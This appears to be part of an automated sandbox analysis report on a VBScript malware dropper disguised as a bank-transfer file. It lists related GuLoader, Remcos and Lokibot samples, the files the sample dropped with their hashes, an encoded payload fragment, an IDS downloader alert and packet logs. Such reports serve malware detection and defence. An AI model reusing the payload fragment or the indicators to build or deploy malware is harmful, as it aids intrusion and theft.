	5eRyCYRR9y.exe	Get hash	malicious	ScreenConnect Tool	Browse	216.58.206.78 142.250.184.193
	VD01NDHM8u.exe	Get hash	malicious	ScreenConnect Tool	Browse	216.58.206.78 142.250.184.193
37f463bf4616ecd445d4a1937da06e19	e.dll	Get hash	malicious	Dridex Dropper	Browse	216.58.206.78 142.250.184.193
	file.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse	216.58.206.78 142.250.184.193
	Passport.vbs	Get hash	malicious	Unknown	Browse	216.58.206.78 142.250.184.193
	Aj#U00e1nlatk#U00e9r#U00e9s 09-30-2024#U00b7pdf.vbs	Get hash	malicious	GuLoader, Lokibot	Browse	216.58.206.78 142.250.184.193
	18000012550_20240930_0078864246#U00b7pdf.vbs	Get hash	malicious	Remcos, GuLoader	Browse	216.58.206.78 142.250.184.193
	PRORA#U010cUNSKA ZAHTEVA 09-30-2024#U00b7pdf.vbe	Get hash	malicious	GuLoader, Lokibot	Browse	216.58.206.78 142.250.184.193
	A 413736796#U00b7pdf.vbs	Get hash	malicious	Remcos, GuLoader	Browse	216.58.206.78 142.250.184.193
	Solicitud de presupuesto 09-30-2024#U00b7pdf.vbs	Get hash	malicious	GuLoader, Lokibot	Browse	216.58.206.78 142.250.184.193
	SOLICITUD DE PEDIDO (Universidade de S#U00e3o Paulo (USP))09-30-2024#U00b7pdf.vbs	Get hash	malicious	GuLoader, Lokibot	Browse	216.58.206.78 142.250.184.193
	Recibo de transferencia#U00b7pdf.vbs	Get hash	malicious	Remcos, GuLoader	Browse	216.58.206.78 142.250.184.193

Dropped Files

⊘No context

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_msiexec.exe_fd9a2f4f1029bc37267a198198cc734fbe50_cf6c61e8_df6de71e-5110-4331-aa1a-483f03f8b1f2\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.1152648537733783
Encrypted:	false
SSDEEP:	192:uKg8dnW8RMET0BU/IjeTihG/zuiFAZ24IO84B:nM8RMEABU/Ije//zuiFAY4IO84
MD5:	6320543D26A8CB639270E886985B6271
SHA1:	DA3B8703E0732EABCE97918849504F5E5325A658
SHA-256:	508BFFB5EBFA36DCCA988785A174A0F451CA1CE2D99211BB78E42C76C9AB4CA1
SHA-512:	BE4759B57504CD49A4ECDE5322745ACA81CBF001F72C44B2C7FFB52ECC20303B4EBC738FC39F67724E1A991079A654A284BB08842BAB7244094496A7054F8528
Malicious:	false
Reputation:	low
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.2.2.6.4.3.7.6.1.6.7.7.0.0.4.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.2.2.6.4.3.7.7.3.0.8.3.3.1.0.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.f.6.d.e.7.1.e.-.5.1.1.0.-.4.3.3.1.-.a.a.1.a.-.4.8.3.f.0.3.f.8.b.1.f.2.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.d.a.6.e.9.2.7.-.e.8.a.d.-.4.d.2.4.-.8.b.2.1.-.2.7.9.9.5.6.d.d.a.9.b.5.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.m.s.i.e.x.e.c...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.m.s.i.e.x.e.c...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.6.a.0.-.0.0.0.1.-.0.0.1.4.-.8.3.9.3.-.7.7.2.c.0.9.1.4.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.1.d.0.c.7.c.f.c.a.8.1.0.4.d.0.6.d.e.1.f.0.8.b.9.7.f.2.8.b.3.5.2.0.c.2.4.6.c.d.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERC57C.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Tue Oct 1 13:52:57 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	176613
Entropy (8bit):	3.0282605905704956
Encrypted:	false
SSDEEP:	1536:sZVrGpN4uE2aOWcRLTgRd9QBCDxKD45+m9:8V84uEqJLTgRvQEw
MD5:	62A3153EB5EF0D7E1E82451246E623FB
SHA1:	7A962F075DF9972D541AB433F592649FA27C8302
SHA-256:	9E3DFC8923ECACDFAAAFC888F10FBB3C93D90E677D1DDA1E76E7840AF3A9909C
SHA-512:	1C4F2B2D099A8CCA828D9AD99684C72588172944E1D87DF01D7CABD92871F81BEFDA27E597117A1C3093433DD4FB43B59A1EEF76392DF060A693EE84AADFF19F
Malicious:	false
Reputation:	low
Preview:	MDMP..a..... ..........f........................<................T..........T.......8...........T...........pY..uX..........X(..........D..............................................................................eJ.............GenuineIntel............T..............f............................. ..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WERC917.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	6338
Entropy (8bit):	3.722148584454504
Encrypted:	false
SSDEEP:	96:RSIU6o7wVetbE769UMb3Yfl4xuQE/Cq65aM4UL89bpAsfjgDm:R6l7wVeJE76CaYd40uprL89bpAsfMDm
MD5:	6CCC74B02245138E7A56B5A43BC04E9C
SHA1:	0110E27C09A1B44EDE87EDA913B310617551D52B
SHA-256:	AF5A1B89B25B267C75BEA0AE403663CA753B9B389AEE5EBEA268C21435A658C7
SHA-512:	FEBCABED1167AC56AF83A3AD1A50CDC99B834799474F8E775E85E24FBE3983DABC830C93EB2AA32B430673FDE3B84CF6F1FD15F0FE1951AACD1717E827DAF710
Malicious:	false
Reputation:	low
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.7.9.2.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERC938.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4654
Entropy (8bit):	4.468925175277751
Encrypted:	false
SSDEEP:	48:cvIwWl8zscQJg77aI90/nWpW8VYlYm8M4JJDjFbk+q80MLfEF2d:uIjfxI7O/W7VtJJBkRGfEF2d
MD5:	B03DB6AF21E1403B6FAAABBDB62FE7C3
SHA1:	F8A18FE81F5F7561EAEB74000200F10809F71FFB
SHA-256:	C1CBA4A5362A1FAF1DD281A2F74200AFC1E52B7DC2A6ADECDD6D2B0AF60DB7B4
SHA-512:	38B931DDF56391B84AB6F3914056C2152B32F03EF37306FCE6AF4C479CBB200070A68219759B57A819A42BA831CA17EA8BB7DDC26AA2183D4DB469C4DEFE7F00
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="524455" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	modified
Size (bytes):	11608
Entropy (8bit):	4.8908305915084105
Encrypted:	false
SSDEEP:	192:yVsm5eml2ib4LxoeRm3YrKkzYFQ9smKp5pVFn3eGOVpN6K3bkkjo5xgkjDt4iWNH:yCib4PYbLVoGIpN6KQkj2qkjh4iUx6iP
MD5:	FE1902820A1CE8BD18FD85043C4D9C5C
SHA1:	62F24EAE4A42BA3AE454A6FAB07EF47D1FE9DFD6
SHA-256:	8BBDC66564B509C80EA7BE85EA9632ACD0958008624B829EA4A24895CA73D994
SHA-512:	8D1BADE448F0C53D6EC00BC9FACDBCB1D4B1B7C61E91855206A08BDBF61C6E4A40210574C4193463C8A13AE692DD80897F3CE9E39958472705CF17D77FE9C1D9
Malicious:	false
Preview:	PSMODULECACHE.....$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module........Find-Command........Unregister-PSRepository........Get-InstalledScript........Get-DynamicOptions........Add-PackageSource........Register-PSRepository........Find-DscResource........Publish-Script........Find-RoleCapability........Uninstall-Package........Get-PackageDependencies........pumo........fimo........Find-Script........Initialize-Provider........Get-PackageProviderName........Test-ScriptFileInfo........Get-InstalledModule........Update-ScriptFileInfo........Get-InstalledPackage........Resolve-PackageSource........Uninstall-Module........inmo........Remove-PackageSource........Update-Script........Uninstall-Script........Update-ModuleManifest........Get-Feature........Install-Module........Install-Package........New-ScriptFileInfo...

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	1.1628158735648508
Encrypted:	false
SSDEEP:	3:NlllulLhwlz:NllUO
MD5:	F442CD24937ABD508058EA44FD91378E
SHA1:	FDE63CECA441AA1C5C9C401498F9032A23B38085
SHA-256:	E2960AF08E2EE7C9C72EEA31DBBFE1B55B9BF84DE2DD7BB7204487E6AF37B8F6
SHA-512:	927E2EEA0BB3FC3D3A0DA7F45644F594CE29F11D90A84B005D723500258DE9E8B3780EB87242F4C62B64B9FEEA1869FC16076FA3AC89EC34E0546CDE1BEF7631
Malicious:	false
Preview:	@...e................................................@..........

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2j1dqkfk.1vk.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2scbleco.jes.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ccr0qhz5.fub.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yjci1ghq.ux1.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Roaming\Nonpunctuating.sem

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with very long lines (65536), with no line terminators
Category:	dropped
Size (bytes):	408184
Entropy (8bit):	5.966661239453342
Encrypted:	false
SSDEEP:	6144:gDxX64IIDFSetfK2IZEM2u71F0sVELERuTlZAAGWul39oJ0eno2t:gDsWjfK+2AJlTl5x+3S/
MD5:	16C143CA49E7146C80DC68BBF23AE6E1
SHA1:	E62E4CEBAD7844465B3B91A26B00E2A3AD3ADC05
SHA-256:	A4D0B0620550854CFD0C2F78AD64372FE54C28268402E0C1C195EFC9DF2C8630
SHA-512:	C1080C102E5CACCEB7E57548FE0CB9F8E121076C42A22C8EE022CA2672607D08F29BF2AA684CBBA1763BADFDD940955D3B47AAD20FFA7B260E6F3B2473783264
Malicious:	false
Preview:	6wJVB3EBm7uYXwsAcQGb6wKtjgNcJATrAjPbcQGbuTUJC9rrAuUa6wJy3oHxgGjPvesCrhdxAZuB8bVhxGfrAlNgcQGb6wKG1OsC7u266AdEyusCKa1xAZtxAZtxAZsxyusCPfzrAp5XiRQLcQGbcQGb0eLrAvkh6wKiq4PBBOsCT2/rAp03gfkok+8BfMpxAZvrAm8Qi0QkBOsCmrrrArZbicNxAZvrAvHCgcNE/fkAcQGbcQGbuq0XCZ1xAZtxAZuB8gP5nXzrAqbu6wJgOIHqru6U4esCJwvrApvgcQGbcQGbcQGbcQGbiwwQcQGbcQGbiQwTcQGbcQGbQusCg/lxAZuB+iQ2BAB12HEBm3EBm4lcJAxxAZvrAgHoge0AAwAA6wKETOsClBCLVCQIcQGb6wKirIt8JARxAZtxAZuJ63EBm3EBm4HDnAAAAOsChERxAZtTcQGbcQGbakDrAijUcQGbievrAkiCcQGbx4MAAQAAAAD+AXEBm+sCyViBwwABAABxAZtxAZtT6wIWDesC3FiJ63EBm+sC8AKJuwQBAADrAkJS6wLgT4HDBAEAAOsCk85xAZtT6wJZoesCScZq/+sC0aRxAZuDwgVxAZvrApcvMfbrAn7f6wJ2/THJ6wLjRnEBm4sacQGbcQGbQXEBm3EBmzkcCnX06wLeh3EBm0ZxAZvrAq+2gHwK+7h13nEBm+sC3+GLRAr86wJKLHEBmynw6wIre3EBm//ScQGb6wIEELokNgQAcQGbcQGbMcDrAhKxcQGbi3wkDHEBm3EBm4E0B6kYVYVxAZvrAqo+g8AE6wINU+sCjP050HXjcQGbcQGbifvrAswOcQGb/9dxAZvrAiqpLMq9h6kYVb1UnZXeIP2SwGr+mboGmSBGVhaToChdlsVItlsE3NsMJQGBGXrk2yB//JGwPAuuQV4o2Z2d0wXUbFpOK5Qo2fQCRgCiRGUceLxuXFiFlDTa1ihsWIW+SEYdKGxYhWI6

Static File Info

General

File type:	ASCII text, with very long lines (352), with CRLF line terminators
Entropy (8bit):	4.868497920338346
TrID:
File name:	r20240913TRANSFERENCIA.vbs
File size:	98'756 bytes
MD5:	6189a9d977994601ef954a1a146e8d8d
SHA1:	93c638448ad65e7b005fa7c4527786e5462b05f2
SHA256:	be4b7116fa1243c9ad977381f3301854cca00273f968881bdf87c8e6777dca32
SHA512:	21d6b94be5fdb9e65b77e22de584cbad6ec3cd751f28dc478bee1d74c686538d5ef7038d8293d3d704547df871bead4cfe4a14ee52bac59124b685040b82326d
SSDEEP:	3072:7LoqFwl872xHXYxo12gEzZPQxMQuh7q+UUdwnu3:Y0wq72NMokdzZaDuhe+UAl
TLSH:	29A32812EED50B3B0E66179DBE510F06C8FCC5194226E8ECEA9E071F501396C97BF268
File Content Preview:	..Rem Smreostes! denaturisation festkldning186 emily wearisome;..Rem Sidst; opladende unintermission; skattemaessige untenaciousness..Rem Waterlander scandinavians: siamesers? farveinstallationsprogrammer, teratoscopy..Rem Omeletfyld. papercurrency: unvin

File Icon


Icon Hash:	68d69b8f86ab9a86

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-10-01T15:52:47.776128+0200	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.5	49715	216.58.206.78	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 1, 2024 15:52:01.223978996 CEST	49704	443	192.168.2.5	216.58.206.78
Oct 1, 2024 15:52:01.224044085 CEST	443	49704	216.58.206.78	192.168.2.5
Oct 1, 2024 15:52:01.224148035 CEST	49704	443	192.168.2.5	216.58.206.78
Oct 1, 2024 15:52:01.231854916 CEST	49704	443	192.168.2.5	216.58.206.78
Oct 1, 2024 15:52:01.231875896 CEST	443	49704	216.58.206.78	192.168.2.5
Oct 1, 2024 15:52:01.987832069 CEST	443	49704	216.58.206.78	192.168.2.5
Oct 1, 2024 15:52:01.987919092 CEST	49704	443	192.168.2.5	216.58.206.78
Oct 1, 2024 15:52:01.989034891 CEST	443	49704	216.58.206.78	192.168.2.5
Oct 1, 2024 15:52:01.989115000 CEST	49704	443	192.168.2.5	216.58.206.78
Oct 1, 2024 15:52:01.993381023 CEST	49704	443	192.168.2.5	216.58.206.78
Oct 1, 2024 15:52:01.993422985 CEST	443	49704	216.58.206.78	192.168.2.5
Oct 1, 2024 15:52:01.993721008 CEST	443	49704	216.58.206.78	192.168.2.5
Oct 1, 2024 15:52:02.005249023 CEST	49704	443	192.168.2.5	216.58.206.78
Oct 1, 2024 15:52:02.047410965 CEST	443	49704	216.58.206.78	192.168.2.5
Oct 1, 2024 15:52:02.380527020 CEST	443	49704	216.58.206.78	192.168.2.5
Oct 1, 2024 15:52:02.381134033 CEST	443	49704	216.58.206.78	192.168.2.5
Oct 1, 2024 15:52:02.381207943 CEST	49704	443	192.168.2.5	216.58.206.78
Oct 1, 2024 15:52:02.385001898 CEST	49704	443	192.168.2.5	216.58.206.78
Oct 1, 2024 15:52:02.395916939 CEST	49705	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:02.395956993 CEST	443	49705	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:02.396085024 CEST	49705	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:02.396390915 CEST	49705	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:02.396404982 CEST	443	49705	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:03.104532957 CEST	443	49705	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:03.104703903 CEST	49705	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:03.107428074 CEST	49705	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:03.107445955 CEST	443	49705	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:03.107884884 CEST	443	49705	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:03.111866951 CEST	49705	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:03.155421019 CEST	443	49705	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:03.405828953 CEST	49705	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:03.405949116 CEST	443	49705	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:03.406028032 CEST	49705	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:07.609044075 CEST	49706	443	192.168.2.5	216.58.206.78
Oct 1, 2024 15:52:07.609114885 CEST	443	49706	216.58.206.78	192.168.2.5
Oct 1, 2024 15:52:07.609229088 CEST	49706	443	192.168.2.5	216.58.206.78
Oct 1, 2024 15:52:07.609483957 CEST	49706	443	192.168.2.5	216.58.206.78
Oct 1, 2024 15:52:07.609498024 CEST	443	49706	216.58.206.78	192.168.2.5
Oct 1, 2024 15:52:08.361325979 CEST	443	49706	216.58.206.78	192.168.2.5
Oct 1, 2024 15:52:08.372104883 CEST	49706	443	192.168.2.5	216.58.206.78
Oct 1, 2024 15:52:08.372123003 CEST	443	49706	216.58.206.78	192.168.2.5
Oct 1, 2024 15:52:08.764245987 CEST	443	49706	216.58.206.78	192.168.2.5
Oct 1, 2024 15:52:08.764753103 CEST	443	49706	216.58.206.78	192.168.2.5
Oct 1, 2024 15:52:08.764806986 CEST	49706	443	192.168.2.5	216.58.206.78
Oct 1, 2024 15:52:08.764847994 CEST	49706	443	192.168.2.5	216.58.206.78
Oct 1, 2024 15:52:08.765727997 CEST	49707	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:08.765757084 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:08.765835047 CEST	49707	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:08.766072989 CEST	49707	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:08.766087055 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:09.415158987 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:09.415282011 CEST	49707	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:09.416640043 CEST	49707	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:09.416651964 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:09.416894913 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:09.417670012 CEST	49707	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:09.463396072 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:11.795664072 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:11.795829058 CEST	49707	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:11.801567078 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:11.801650047 CEST	49707	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:11.814099073 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:11.814152956 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:11.814213991 CEST	49707	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:11.814229965 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:11.814450979 CEST	49707	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:11.821149111 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:11.868071079 CEST	49707	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:11.885904074 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:11.885998964 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:11.886029959 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:11.886122942 CEST	49707	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:11.886141062 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:11.886280060 CEST	49707	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:11.886328936 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:11.891187906 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:11.891237974 CEST	49707	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:11.891246080 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:11.909965992 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:11.910007000 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:11.910039902 CEST	49707	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:11.910039902 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:11.910053968 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:11.910111904 CEST	49707	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:11.910645962 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:11.910690069 CEST	49707	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:11.910698891 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:11.916336060 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:11.916390896 CEST	49707	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:11.916399002 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:11.922909975 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:11.922955036 CEST	49707	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:11.922961950 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:11.928503036 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:11.928544044 CEST	49707	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:11.928550959 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:11.934453964 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:11.934518099 CEST	49707	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:11.934528112 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:11.940227032 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:11.940274000 CEST	49707	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:11.940280914 CEST	443	49707	142.250.184.193	192.168.2.5
